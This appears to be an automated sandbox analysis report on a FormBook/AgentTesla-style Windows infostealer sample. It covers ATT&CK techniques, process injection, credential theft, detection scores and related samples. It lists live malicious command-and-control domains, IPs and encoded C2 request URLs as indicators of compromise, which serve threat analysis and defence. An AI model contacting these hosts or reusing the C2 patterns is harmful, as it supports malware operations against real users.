            Source: Yara matchFile source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465309 Sample: indent PWS-020199.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 31 www.hellokong.xyz 2->31 33 www.xxikcn20.icu 2->33 35 5 other IPs or domains 2->35 45 Snort IDS alert for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 53 5 other signatures 2->53 10 indent PWS-020199.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\...\indent PWS-020199.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 indent PWS-020199.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 netiougc.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.hellokong.xyz 203.161.49.220, 49750, 49751, 49752 VNPT-AS-VNVNPTCorpVN Malaysia 23->37 39 www.eylmpwjot.store 43.132.189.227, 49758, 49759, 49760 LILLY-ASUS Japan 23->39 41 3 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            indent PWS-020199.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            indent PWS-020199.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
            http://www.fontbureau.com0%URL Reputationsafe
            http://www.fontbureau.com/designersG0%URL Reputationsafe
            http://www.fontbureau.com/designers/?0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.fontbureau.com/designers?0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://www.fontbureau.com/designers0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.com/designers80%URL Reputationsafe
            http://www.fonts.com0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.hellokong.xyz/ov93/0%Avira URL Cloudsafe
            http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
            http://www.eylmpwjot.store/3mcu/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
            http://www.eylmpwjot.store0%Avira URL Cloudsafe
            http://www.searchvity.com/0%Avira URL Cloudsafe
            http://www.artvectorcraft.store/jabf/0%Avira URL Cloudsafe
            http://www.netgain360.online/7w6o/0%Avira URL Cloudsafe
            https://www.mareomnia.com/ya74/?dBOL8fg=100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ghs.google.com
            		142.250.74.211
            		truefalse
              		unknown
              www.netgain360.online
              		66.96.162.130
              		truetrue
                		unknown
                www.mareomnia.com
                		81.4.100.198
                		truefalse
                  		unknown
                  www.hellokong.xyz
                  		203.161.49.220
                  		truetrue
                    		unknown
                    www.eylmpwjot.store
                    		43.132.189.227
                    		truetrue
                      		unknown
                      www.artvectorcraft.store
                      		unknown
                      		unknowntrue
                        		unknown
                        www.xxikcn20.icu
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.eylmpwjot.store/3mcu/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.hellokong.xyz/ov93/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.artvectorcraft.store/jabf/false
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.netgain360.online/7w6o/true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabnetiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersGindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designers/?indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/bTheindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers?indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://tempuri.org/DataSet1.xsdindent PWS-020199.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.goodfont.co.krindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.ecosia.org/newtab/netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0indent PWS-020199.exefalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.comlindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.comindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.typography.netDindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ac.ecosia.org/autocomplete?q=netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/cTheindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-user.htmlindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.searchvity.com/netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.eylmpwjot.storelcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.galapagosdesign.com/DPleaseindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers8indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fonts.comindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sandoll.co.krindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.searchvity.com/?dn=netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.urwpp.deDPleaseindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.zhongyicts.com.cnindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sakkal.comindent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.mareomnia.com/ya74/?dBOL8fg=firefox.exe, 0000000A.00000002.2311704116.0000000002776000.00000004.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          81.4.100.198
                          		www.mareomnia.comNetherlands
                          		198203ASN-ROUTELABELNLfalse
                          142.250.74.211
                          		ghs.google.comUnited States
                          		15169GOOGLEUSfalse
                          43.132.189.227
                          		www.eylmpwjot.storeJapan4249LILLY-ASUStrue
                          66.96.162.130
                          		www.netgain360.onlineUnited States
                          		29873BIZLAND-SDUStrue
                          203.161.49.220
                          		www.hellokong.xyzMalaysia
                          		45899VNPT-AS-VNVNPTCorpVNtrue

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1465309
                          Start date and time:2024-07-01 15:10:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 47s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:indent PWS-020199.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@7/2@6/5
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 89%
                          • Number of executed functions: 92
                          • Number of non-executed functions: 282
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • VT rate limit hit for: indent PWS-020199.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          09:10:59API Interceptor1x Sleep call for process: indent PWS-020199.exe modified
                          09:12:06API Interceptor2021057x Sleep call for process: netiougc.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          81.4.100.198PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • www.mareomnia.com/ya74/
                          Shipping Documents.com.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.mareomnia.com/0mbu/
                          43.132.189.227PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • www.eylmpwjot.store/3mcu/
                          66.96.162.130PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • www.netgain360.online/7w6o/
                          cLX08Rntoj.exeGet hashmaliciousFormBook, NSISDropperBrowse
                          • www.driftlessmenofthewoods.com/tb8i/?Ehx=eqj5Z4zaBxt3iGMX2iEL2pQMeiYVPR0bHgZP6CoLSIL3fSyWSgPlG7k+Yxg4XoDwMKdKWhs6sg==&mjuh=SzrhR6
                          rJustificante_operacionpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.yourstruly.global/dfoj/?c6BJS_=XeclOGL9jmxjrHWcmThOii+mi0kNzyqI2YWUcghANm6mUIyFObCFeER7lxBcVGQAQaL3cdF9nfoovzM1Jm7f+fmFLo4qBxVj4Q==&RlmA=rfhOchFOPjHwozW
                          DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.yourstruly.global/rg4i/?A4=Yx41ac0tlZ78&O9=vEw3RlOzg1E1V17NxrEMOqPT4cG9Ul8wL4YZcymnhSWNOrEk66Q0iW6kDk3beYl1Kbw6qMNc4wILDaiQU3wLOOyCtXvdfBkl9A==
                          DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.yourstruly.global/rg4i/?_vhNAINp=vEw3RlOzg1E1V17NxrEMOqPT4cG9Ul8wL4YZcymnhSWNOrEk66Q0iW6kDk3beYl1Kbw6qMNc4wILDaiQU3wLOOyCtXvdfBkl9A==&fSjY=iHlZgxqNf3bHP0
                          DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                          • www.yourstruly.global/rg4i/?BIKaa=FEvnYOqO2&pzoP=vEw3RlOzg1E1V17NxrEMOqPT4cG9Ul8wL4YZcymnhSWNOrEk66Q0iW6kDk3beYl1Kbw6qMNc4wILDaiQU3wLOOyCtXvdfBkl9A==
                          INTHIST_230714122537.vbsGet hashmaliciousFormBookBrowse
                          • www.amrresourcesgroup.com/sgr3/
                          Purchase Order.exeGet hashmaliciousFormBookBrowse
                          • www.modbox.site/hcfu/
                          TT copy.exeGet hashmaliciousFormBookBrowse
                          • www.408wmountain.info/umat/?bT7tPLpx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2Ti+o1fqk+Bj&Lls=Mzrp
                          paymentcopy_0012.exeGet hashmaliciousFormBookBrowse
                          • www.408wmountain.info/umat/?vTAl2hqx=+g+DxeMkQzGDCM6UtLigEqbhHpqmy5i0tcGfeVxiUfs1lW6LnDSR3mKv2TiU3Fvqg8Jj&E6fT=0PnHHJyp
                          203.161.49.220Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                          • www.evertudy.xyz/csr7/
                          Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                          • www.evertudy.xyz/csr7/
                          KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                          • www.evertudy.xyz/csr7/
                          288292021 ABB.exeGet hashmaliciousFormBookBrowse
                          • www.techsterverse.xyz/5ane/?Hp=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HxzfaZ9sFDrl94fCLYBT2VvoaMEhAOTvuaALRdPfNkFFP06X4hxPxwuOU&5H=CtUlKhgP42a
                          RITS Ref 3379-06.exeGet hashmaliciousFormBookBrowse
                          • www.techsterverse.xyz/5ane/?PZZHdl=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/H2zfaZ9sACaNxu/D8bx39CdhsPlkTcA==&TDo=elNLn2HxeBBPWX10
                          NGL 3200-Phase 2- Strainer.exeGet hashmaliciousFormBookBrowse
                          • www.techsterverse.xyz/5ane/?oH=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/HwxfbZscDEJxTpvGxYC7OVvobfxBceSnIUgLeJPvVkXUBrA==&ML=uVzXijwPkXTxAbN
                          ORDEN DE COMPRA URGENTEsxlx..exeGet hashmaliciousFormBookBrowse
                          • www.vertilehub.xyz/ei4t/
                          M.R NO. 1212-00-RE-REQ-649-01.scr.exeGet hashmaliciousFormBookBrowse
                          • www.techsterverse.xyz/5ane/?8DVHhn=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/Hx0nDEfEAEKNh4PCLYBX4V8BeMVlAejvkZFjREePNhVFP9KTG2Hw=&DNnlG=PlN8o25pW6
                          PMP-INS-93-2436-IN-1017.scr.exeGet hashmaliciousFormBookBrowse
                          • www.techsterverse.xyz/5ane/?MHWTU=WTbBFWOTcFPDCMhDe+eJlggkj0wA+TTy940HcquptONdD9QmK5HdLPKC5ymHK27F/BdIZvlTb7atmdZ+8u/H20noO4IFRPxhp/GxYC7OVvobP3MfeinOdB7RNePVkXUBrA==&xrPXO=8dphzh68zTJt
                          BANCO SWIFTs#U0334x#U0334l#U0334x#U0334..exeGet hashmaliciousFormBookBrowse
                          • www.vertilehub.xyz/ei4t/

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          www.netgain360.onlinePI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.130
                          www.hellokong.xyzPI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • 203.161.49.220
                          www.mareomnia.comPI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • 81.4.100.198
                          Shipping Documents.com.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 81.4.100.198
                          www.eylmpwjot.storePI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • 43.132.189.227
                          LMZ05240257824426283637366563_Final Order.vbsGet hashmaliciousFormBookBrowse
                          • 43.132.189.227

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          BIZLAND-SDUSf9DYXBf380.elfGet hashmaliciousMirai, MoobotBrowse
                          • 143.95.188.153
                          eiqj38BeRo.rtfGet hashmaliciousFormBookBrowse
                          • 66.96.162.131
                          Products volume.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.142
                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.149
                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.149
                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.149
                          TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.149
                          ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                          • 66.96.162.149
                          c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                          • 207.148.248.143
                          D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                          • 66.96.161.166
                          VNPT-AS-VNVNPTCorpVNMaterials specification with quantities.exeGet hashmaliciousFormBookBrowse
                          • 203.161.55.102
                          205.185.121.21-mips-2024-07-01T10_13_50.elfGet hashmaliciousMirai, MoobotBrowse
                          • 14.235.97.77
                          DHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                          • 203.161.41.207
                          file.exeGet hashmaliciousFormBookBrowse
                          • 203.161.43.228
                          1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                          • 203.161.62.199
                          AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                          • 203.161.41.205
                          file.exeGet hashmaliciousFormBookBrowse
                          • 203.161.43.228
                          BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                          • 203.162.147.170
                          EGR7RZv5Km.elfGet hashmaliciousMirai, MoobotBrowse
                          • 113.180.204.160
                          enjTj0J3qX.elfGet hashmaliciousMirai, MoobotBrowse
                          • 14.178.101.125
                          ASN-ROUTELABELNLPI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                          • 81.4.100.198
                          https://yesterwebring.neocities.orgGet hashmaliciousPhisherBrowse
                          • 185.34.216.213
                          What_is_Ramadan.exeGet hashmaliciousAlphaKnightsBrowse
                          • 176.56.237.126
                          My_diet_chart_Daily.exeGet hashmaliciousAlphaKnightsBrowse
                          • 176.56.237.126
                          My_diet_chart_Daily.exeGet hashmaliciousAlphaKnightsBrowse
                          • 176.56.237.126
                          My_diet_chart_Daily.exeGet hashmaliciousAlphaKnightsBrowse
                          • 176.56.237.126
                          Shipping Documents.com.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • 81.4.100.198
                          1.jsGet hashmaliciousUnknownBrowse
                          • 185.157.209.10
                          http://185.52.2.193/APP/AAPGet hashmaliciousUnknownBrowse
                          • 185.52.2.193
                          tp1Iu7zUZy.exeGet hashmaliciousAgentTeslaBrowse
                          • 185.34.216.213
                          LILLY-ASUS103.162.20.166-sora.arm6-2024-06-28T11_40_37.elfGet hashmaliciousMiraiBrowse
                          • 40.36.249.154
                          AAMwAy8pB7.elfGet hashmaliciousMirai, MoobotBrowse
                          • 42.170.240.214
                          QewpDKdeRJ.elfGet hashmaliciousMirai, MoobotBrowse
                          • 43.132.28.166
                          BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                          • 40.12.31.192
                          g75NqH852l.elfGet hashmaliciousMirai, MoobotBrowse
                          • 43.189.20.23
                          V7UaNBrX72.elfGet hashmaliciousMirai, MoobotBrowse
                          • 40.6.139.124
